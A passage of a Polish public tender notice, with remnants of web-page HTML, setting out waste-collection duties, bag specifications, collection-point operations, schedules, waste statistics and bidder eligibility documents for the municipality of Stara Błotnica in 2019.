najmniej 50%;2) w Rozporządzeniu Ministra Środowiska z dnia 15 grudnia 2017 r. w sprawie poziomów ograniczenia składowania masy odpadów komunalnych ulegających biodegradacji (Dz.U. z 2017 r. poz. 2412). przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów w stosunku do masy tych odpadów wytworzonych w 1995 roku:a) w roku 2019 - co najmniej 40%.2.14. Wykonawca jest zobowiązany do bieżącego prowadzenia ewidencji odpadów oraz dokumentacji związanej z działalnością objętą przedmiotem niniejszego zamówienia zgodnie z odrębnymi przepisami prawa.2.15. Wykonawca jest zobowiązany do sporządzania i przekazywania Zamawiającemu w formie papierowej miesięcznych raportów ( wzór - załącznik nr 8 do SIWZ) zawierających informacje o:1) masie poszczególnych rodzajów odebranych w ramach realizacji umowy odpadów komunalnych oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania;2) masie poszczególnych rodzajów odebranych w ramach realizacji umowy odpadów komunalnych gromadzonych w sposób selektywny oraz sposobie ich zagospodarowania wraz ze wskazaniem instalacji do której zostały przekazane;3) liczbie nieruchomości, z których zostały odebrane odpady komunalne w ramach realizacji umowy;4) nieruchomościach, w których właściciele zbierają odpady komunalne w sposób niezgodny z zadeklarowanym sposobem zbierania odpadów.2.16. Wykonawca jest zobowiązany do sporządzania sprawozdań zgodnie z zapisami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości porządku w gminach (t.j. Dz. U. z 2018 r. poz. 1454 ).Do wyżej wymienionych raportów Wykonawca przedstawi Zamawiającemu poświadczone za zgodność z oryginałem kserokopie dowodów dostarczania odpadów do instalacji odzysku lub unieszkodliwiania, tj. karty ewidencji odpadów, karty przekazania odpadów oraz dokumenty potwierdzające recykling i odzysk.Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących następujące czynności w zakresie realizacji przedmiotu zamówienia: osób wykonujących czynności bezpośrednio związanych z odbiorem, załadunkiem, transportem, wyładunkiem odpadów. Dane osób wykonujących wskazane wyżej prace zostaną ujęte w umowie z wykonawcą (w formie załącznika). Każdorazowa zmiana załącznika w przypadku wystąpienia konieczności zmiany danych osób oddelegowanych do wykonywania zamówienia nie wymaga aneksu do umowy (wykonawca przedstawia korektę załącznika w przypadku zmiany osób oddelegowanych do wykonywania zamówienia do wiadomości zamawiającego). Zamawiający zastrzega sobie prawo przeprowadzenia kontroli w celu zweryfikowania, czy osoby wykonujące czynności przy realizacji zamówienia są osobami wskazanymi przez wykonawcę na zasadach wskazanych we wzorze umowy. Zaniechanie obowiązku zatrudnienia na umowę o prace skutkuje powstaniem odpowiedzialności wykonawcy z tytułu niewykonania lub nienależytego wykonania umowy w sprawie zamówienia. Wykonawca do każdej faktury musi złożyć oświadczenie o zatrudnieniu wszystkich osób wskazanych w wykazie na podstawie umowy o pracę3. Wyposażenie nieruchomości w urządzenia do gromadzenia odpadów.3.1. Wykonawca wyposaży każde gospodarstwo domowe w: 4 szt. worków czarnych, 2 szt. worków żółtych i po 1 szt. z pozostałych kolorów do dnia 02 stycznia 2019 roku.3.2. W trakcie realizacji zobowiązań zawartych w umowie Wykonawca ma obowiązek dostarczyć właścicielowi nieruchomości, w dniu odbioru odpadów, tyle worków ile odebrał z zachowaniem kolorystyki.3.3 Worki muszą być oznaczone przez Wykonawcę informacją o rodzaju odpadów, które należy w nich gromadzić. Worki muszą też być oznaczone nazwą, adresem i numerem telefonu Wykonawcy.3.4. Charakterystyka worków do selektywnej zbiórki odpadów:1) materiał - folia LDPE,2) pojemność - 120 l,3) grubość - co najmniej 60 mikronów,4) nadruk - jednostronny,5) kolory:- czarny - odpady komunalne-bytowe,- niebieski - papier, tektura, odpady opakowaniowe z papieru i tektury- żółty - tworzywa sztuczne, metale, odpady opakowaniowe z metali i tworzyw sztucznych, opakowania wielomateriałowe- biały - szkło bezbarwne- zielony - szkło kolorowe i opakowania szklane,- brązowy - odpady zielone i bioodpady.3.5. Szacunkowa ilość worków ( na cały okres umowy) to:1) worki czarne - ok. 62 000 szt.(4szt./miesiąc/gospodarstwo),2) worki żółte - ok. 50 000 szt.(3szt./miesiąc/gospodarstwo),3) worki biały - ok. 4 000szt.(1szt./miesiąc/gospodarstwo),4) worki niebieski - ok. 9 000 szt. (1szt./2 miesiące/ gospodarstwo),5) worek zielony - ok. 7 500 szt. (1 szt./1 miesiąc/gospodarstwo),6) worek brązowy - ok. 15 500 szt. (1szt.1/miesiąc/gospodarstwo).3.6. Wykonawca będzie zobowiązany do dostarczenia do siedziby Zamawiającego 1 raz na kwartał po 100 szt. Worków każdego rodzaju.4. Wyposażenie i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych.4.1. W czasie trwania umowy Wykonawca prowadzi Punkt Zbiórki Odpadów Komunalnych w miejscowości Czyżówka 42, plac przy Oczyszczalni Ścieków. PSZOK jest własnością Gminy Stara Błotnica - wydzierżawiony Wykonawcy, teren jest ogrodzony, oświetlony, utwardzony, monitorowany, nie posiada wagi.4.2. Prowadzenie PSZOK polega w szczególności na :1) wyposażeniu PSZOK w odpowiednio oznakowane kontenery i pojemniki dla poszczególnych selektywnie gromadzonych odpadów:a) kontenery otwarte typu KP7 - 2 szt. (na odpady wielkogabarytowe, odpady budowlane i rozbiórkowe),b) kontenery zamknięte 1,1 m? - 10 szt. ( papier i tektura, metale, tworzywa sztuczne, szkło, zużyty sprzęt elektryczny i elektroniczny, opony, popiół i żużel, odpady zielone, tekstylia i odzież, odpady niebezpieczne),2) przyjmowanie wymienionych w punkcie 4.3. poszczególnych rodzajów odpadów dostarczonych wyłącznie przez mieszkańców Gminy Stara Błotnica po okazaniu dowodu uiszczania opłaty za odbiór i gospodarowanie odpadami komunalnymi;3) zapewnieniu funkcjonowania PSZOK przez cały okres umowy - dwa razy w miesiącu, zgodnie z podanym harmonogramem,4) zapewnieniu osoby do obsługi PSZOK,5) utrzymaniu czystości i porządku na terenie PSZOK, które obejmuje w szczególności: zamiatanie, bieżące wskazywanie mieszkańcom odpowiednich kontenerów do segregacji, zapobieganie ich przeładowania, utrzymanie ich w odpowiednim stanie technicznym i sanitarnym, odbiór odpadów i przekazanie do dalszej obróbki;6) prowadzenie ewidencji przyjmowanych odpadów, zawierającej datę przyjęcia, rodzaj odpadu lub jego ilość, dane osoby przekazującej;4.3. Odpady komunalne przyjmowane do PSZOK;1) papier i tektura wraz z opakowaniami wielomateriałowymi;2) metale;3) tworzywa sztuczne;4) szkło i opakowania szklane;5) meble i inne odpady wielkogabarytowe;6) zużyty sprzęt elektryczny i elektroniczny;7) odpady budowlane i rozbiórkowe;8) zużyte opony;9) odpady niebezpieczne (chemikalia, opakowania po środkach ochrony roślin, przeterminowane lekarstwa, świetlówki, baterie i akumulatory, itp.);10) tekstylia i odzież;11) odpady zielone; 12) popiół i żużel.5. Częstotliwość odbioru odpadów komunalnych.5.1. W ramach zamówienia Wykonawca zobowiązany będzie odbierać odpady komunalne z następującymi częstotliwościami:1) odpady komunalno-bytowe, odpady zielone i bioodpady - 1 raz w miesiącu;2) opakowania wielomateriałowe, tworzywa sztuczne, metale - 1 raz w miesiącu;3) szkło, opakowania szklane, papier i tektura - 1 raz w miesiącu;4) odpady gromadzone w PSZOK - w zależności od zapełnienia pojemników i kontenerów, jednak nie rzadziej niż raz na kwartał,5) zbiórka odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon - dwa razy do roku ( preferowane miesiące to kwiecień i październik).6. Harmonogram.6.1. Wykonawca ma obowiązek opracować harmonogram odbioru odpadów komunalnych gromadzonych w sposób zmieszany i selektywny z nieruchomości zamieszkałych znajdujących się na terenie Gminy Stara Błotnica z uwzględnieniem poszczególnych rodzajów odpadów.6.2. Harmonogram odbioru odpadów komunalnych musi uwzględniać następujące zasady:1) odbiór odpadów przez Wykonawcę musi odbywać się w dni robocze, od poniedziałku do piątku w godzinach 7:00-18:00,2) harmonogram musi uwzględniać częstotliwość odbioru wskazaną w punkcie 5.1 ,3) harmonogram ma być opracowany w sposób przejrzysty, wskazując konkretne daty odbioru, z zachowaniem regularności i powtarzalności odbierania poszczególnych rodzajów odpadów, tj. odbiór z danej nieruchomości ma przypadać na ten sam dzień tygodnia,4) w przypadku gdy odbiór przypada na dzień ustawowo wolny od pracy w harmonogramie ma być wskazana data odbioru przypadająca maksymalnie na 3 dni przed lub po dniu ustawowo wolnym,5) w harmonogramie Wykonawca ma obowiązek umieścić dane teleadresowe, umożliwiające mieszkańcom kontakt zarówno z Wykonawcą, jak i z Zamawiającym,6) dopuszcza się możliwość opracowania odrębnego harmonogramu zbiórki i odbioru odpadów z miejsc o utrudnionym dostępie.6.3. Obowiązkiem Wykonawcy jest aktualizowanie harmonogramu w miarę zaistniałych potrzeb za zgodą Zamawiającego. Wywóz odpadów będzie się odbywał ściśle wg harmonogramu, uzgodnionego przez Wykonawcę i Zamawiającego jako załącznik do umowy.6.4. Wykonawca odpowiada za dostarczenie harmonogramu mieszkańcom w wersji papierowej, a także za poinformowanie mieszkańców o zaistniałej zmianie przez przekazanie informacji w wersji papierowej do każdego gospodarstwa domowego.6.5. Wykonawca dostarczy mieszkańcom harmonogram do dnia 02 stycznia 2019 roku.7. Reklamacje.7.1. W przypadku braku odbioru odpadów z nieruchomości zgodnie z harmonogramem Zamawiający przekazuje Wykonawcy zgłoszenie reklamacyjne.7.2. Sytuacja, w której Wykonawca nie odbierze odpadów z powodu błędnie przeprowadzonej przez mieszkańca segregacji lub jej braku, a nie powiadomi o tym Zamawiającego zgodnie z wytycznymi zawartymi w punkcie 2.7, traktowana będzie jako brak odbioru odpadów zgodnie z harmonogramem.7.3. Wykonawca realizuje reklamację w ciągu maksymalnie 3 dni roboczych od otrzymania zgłoszenia oraz przesyła drogą elektroniczną podpisany przez Wykonawcę i właściciela nieruchomości, której dotyczy reklamacja, protokół realizacji reklamacji, potwierdzający wykonanie usługi ( w ciągu 24 godzin od dnia realizacji reklamacji).7.4. Zgłoszenie reklamacyjne wskazane w punkcie 7.1. jest podstawą do naliczenia kar umownych za brak odbioru odpadów. W przypadku, gdy kary zastosowano w dwóch następujących po sobie okresach rozliczeniowych Zamawiający ma prawo do wypowiedzenia umowy Wykonawcy.8. Dane ilościowe.8.1. Ilość złożonych deklaracji - 1410 , w których wykazano 4 893 osób, w tym:- odpady segregowane - 1390 deklaracji na 4 840 osoby;- odpady niesegregowane - 20 deklaracji na 53 osób.8.2. Ilość odpadów odebranych w roku 2017 - 550,91 Mg w tym:- zmieszane odpady komunalne - 310,12 Mg,- opakowania ze szkła - 64,25 Mg,- szkło - 11,02 Mg,- tworzywa sztuczne - 33,11 Mg,- inne frakcje zbierane selektywnie - 19,81 Mg,- odpady wielkogabarytowe - 1,76 Mg,-zmieszane odpady opakowaniowe - 99,42 Mg odpady betonu oraz gruz betonowy z rozbiórek i remontów - 2,32 Mg,- elektroodpady - 4,84 Mg.- zużyte opony - 4,26 Mg8.3. Ilość odpadów odebranych w roku 2018 ( I- III kwartału) - 291,46 Mg, w tym:- zmieszane odpady komunalne - 155,96 Mg,- inne frakcje zbierane selektywnie - 81,04 Mg,- opakowania ze szkła - 31,49 Mg,- odpady wielkogabarytowe - 5,76 Mg,- elektroodpady - 5,72 Mg,- zużyte opony - 11,49 Mg. 8.4. Ilości odpadów odebranych z PSZOK W 2017 roku: 16 01 03 - zużyte opony 2,4 Mg 17 09 04 - zmieszane odpady z budowy remontów i demontażu - 4,44 Mg 20 01 23 - urządzenia zawierające freony - 0,33 Mg 20 01 35 - zużyte urządzenia elektryczne i elektroniczne - 1,18 Mg 20 01 36 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23, 20 01 35 - 3,26 Mg 20 03 07 - odpady wielkogabarytowe - 0,70 Mg 10 01 01 - żule i popioły paleniskowe, pyły z kotłów _ 36,3 Mg 2018 rok I-III kwartał :15 01 07 - opakowania ze szkła - 1,30 Mg16 01 03 - zużyte opony - 6,25 Mg20 03 07 - odpady wielkogabarytowe -0,56 Mg20 01 35 - zużyte urządzenia elektryczne i elektroniczne - 0,575 Mg20 01 36 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23, 20 01 35 - 1,33 Mg20 01 23 -- urządzenia zawierające freony - 0,63 Mg 17 01 82 - inne nie wymienione odpady - 08.5. Ilość odpadu żużlu i popiołu została ujęta łącznie, jako inne frakcje zbierane selektywnie.8.6. Powierzchnia gminy wynosi 9 624 ha.8.7. Gminę tworzy 24 wsie sołeckie. Liczbę budynków mieszkalnych określa się na 1530.8.8. Łączna liczba mieszkańców, na dzień 30.09.2018r. - 5489 osób.8.9. Dane podane w punktach od 8.1. do 8.8. traktować należy jako informacje dodatkowe. Rzeczywista ilość mieszkańców oraz gospodarstw domowych objętych przedmiotem zamówienia może być odmienna od w/w ilości i nie może stanowić jakichkolwiek roszczeń Wykonawcy w stosunku do Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany liczby punktów odbioru odpadów. Ich ilość może wzrosnąć lub zmaleć i jest zależna od informacji zawartych w złożonych deklaracjach prze właścicieli nieruchomości. Wykaz nieruchomości, na których odpady nie są segregowane Zamawiający przekaże Wykonawcy w dniu podpisania umowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90512000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90533000-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2019-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:a)	Wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Stara Błotnica,b)	Posiada wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska,c) zezwolenie Starosty lub Prezydenta (właściwego ze względu na miejsce siedziby lub zamieszkania Wykonawcy) na prowadzenie działalności w zakresie zbierania odpadów i zezwolenie na przetwarzanie odpadów, wydane na podstawie art. 41 ust.1, 2 i 3 pkt. 2) ustawy z dnia 14 grudnia 2012r. o odpadach (t.j. 2018.992 ze zm.),d)	umowę (lub promesę jej zawarcia) lub decyzję w zakresie recyklingu odpadów zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (t.j. 2018.992 ze zm.) - na odbiór odpadów segregowanych.Ocena spełniania tego warunku na podstawie dołączonego na wezwanie zamawiającego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ust.1 ustawy Prawo zamówień publicznych, stanowiącego - Załącznik nr 4 do SIWZ. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.Ocena spełniania tego warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ust.1 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 4 do SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">2.3.1. posiadania wiedzy i doświadczenia;Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.Ocena spełniania tego warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ust.1 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 4 do SIWZ.2.3.2. dysponowania odpowiednim potencjałem technicznym;Zamawiający uzna ten warunek za spełniony jeżeli wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym tj. - dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, - dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, - jednym pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej, - jednym pojazdem do odbioru odpadów z miejsc o utrudnionym dostępie.2.3.3.dysponowania osobami zdolnymi do wykonania zamówienia;Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.Ocena spełniania tego warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ust.1 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 4 do SIWZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. Wypełniony formularz ofertowy (wg Załącznika Nr 2).2. Oświadczenie o braku podstaw do wykluczenia zał. Nr 4a do SIWZ 3. Oświadczenie o spełnieniu warunków Wykonawcy załącznik Nr 4 do SIWZ .4. Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentyskładające się na ofertę podpisuje osoba, której umocowanie do reprezentowaniaWykonawcy nie będzie wynikać z dokumentów załączonych do oferty.Brak jakiegokolwiek z w/w dokumentów lub złożenie dokumentu w niewłaściwej formiespowoduje wykluczenie Wykonawcy z postępowania.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">6.2 Aktualny odpisu z właściwego rejestru lub z centralnej ewidencji i informacjio działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lubewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składaniawniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia alboskładania ofert.6.3 Kopia NIP6.4 Kopia Regon7. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, zamiast dokumentu, o których mowa powyżej, tj. w pkt 6.2 - 6.6:7.1. Składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibęlub miejsce zamieszkania, potwierdzające odpowiednio, że:a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,Dokument, o którym mowa wyżej powinien być wystawiony nie wcześniej niż 6 miesięcyprzed upływem terminu składania ofert, 7.2 Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy, lub miejsce zamieszkania tej osoby.Ważność dokumentu jak w pkt 7.1.7.3 W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę,Zamawiający może się zwrócić do właściwych organów odpowiednio kraju, w którymWykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba,której dokument dotyczy, o udzielenie informacji dotyczących tego dokumentu.8. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówieniadokumenty wymienione w pkt 6.2 - 6.5 i 7 winny być złożone przez każdegoz wykonawców.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">6.2 Aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z godnie z wymogami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminie(t.j. Dz.U. z 2018 r. poz. 1454 ze zm.), prowadzonego przez Wójta Gminy Stara Błotnica.6.3 Aktualne zezwolenie obejmujące prowadzenie działalności w zakresie transportu odpadów komunalnych będących przedmiotem zamówienia zgodnie z wymogami ustawy z dnia 14 grudnia 2012 r. o odpadach ((t.j. 2018.992 ze zm.).)lub równoważne, w tym wydane na podstawie wcześniejszych przepisów.6.4 Aktualny wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska,6.5. Umowę (lub promesę jej zawarcia) lub decyzję w zakresie recyklingu odpadów zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (t.j. 2018.992 ze zm.) - na odbiór odpadów segregowanych6.6 Wykaz posiadanych co najmniej: - dwóch pojazdów przystosowanych do odbierania zmieszanych odpadów komunalnych, - dwóch pojazdów przystosowanych do odbierania selektywnie zebranych odpadów komunalnych, - jednego pojazdu do odbierania odpadów komunalnych bez funkcji kompaktującej, - jednego pojazdu do odbioru odpadów z miejsc o utrudnionym dostępie.7. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 25a ust.1, oświadczeńi dokumentów potwierdzających okoliczności o których mowa w art. 25 ust.1 lub innychdokumentów niezbędnych do przeprowadzenia postępowania, oświadczenia lub dokumentysą niekompletne, zawierają błędy lub budzą wskazane przez Zamawiającego wątpliwości,Zamawiający wezwie do ich złożenia, uzupełnienia lub poprawienia lub do udzieleniawyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia, uzupełnienia lubpoprawienia lub udzielenia wyjaśnień oferta wykonawcy podlega odrzuceniu albo koniecznebyłoby unieważnienie postępowania.8. Wykonawca nie jest obowiązany do złożenia dokumentów wskazanych w punkcie 6.2 i 6.6na wezwanie Zamawiającego, jeżeli Zamawiający posiada aktualne oświadczenia lubdokumenty dotyczące tego wykonawcy potwierdzające spełnienie warunków udziałuw postępowaniu lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych bazdanych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r.o informatyzacji działalności podmiotów realizujących zadania publiczne (j.t. Dz.U. 2017.570 ze zm.).W tym celu, zaleca się aby Wykonawca na wezwanie Zamawiającego przesłanew trybie art. 26 ust. 2 ustawy zamiast złożyć wymagane dokumenty wskazał, w jakimkonkretnie postępowaniu złożył dokumenty będące w posiadaniu Zamawiającego lubw jaki sposób są one dostępne dla Zamawiającego - w celu umożliwienia ichidentyfikacji.9. Dokumenty wymienione w punktach 6.1-6.6 powinny być aktualne na dzień ich złożenia.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wypełniony formularz ofertowy (wg Załącznika Nr 2).2. Oświadczenie o braku podstaw do wykluczenia zał. Nr 4a do SIWZ 3. Oświadczenie o spełnieniu warunków Wykonawcy załącznik Nr 4 do SIWZ .4. Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentyskładające się na ofertę podpisuje osoba, której umocowanie do reprezentowaniaWykonawcy nie będzie wynikać z dokumentów załączonych do oferty.Brak jakiegokolwiek z w/w dokumentów lub złożenie dokumentu w niewłaściwej formiespowoduje wykluczenie Wykonawcy z postępowania.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: 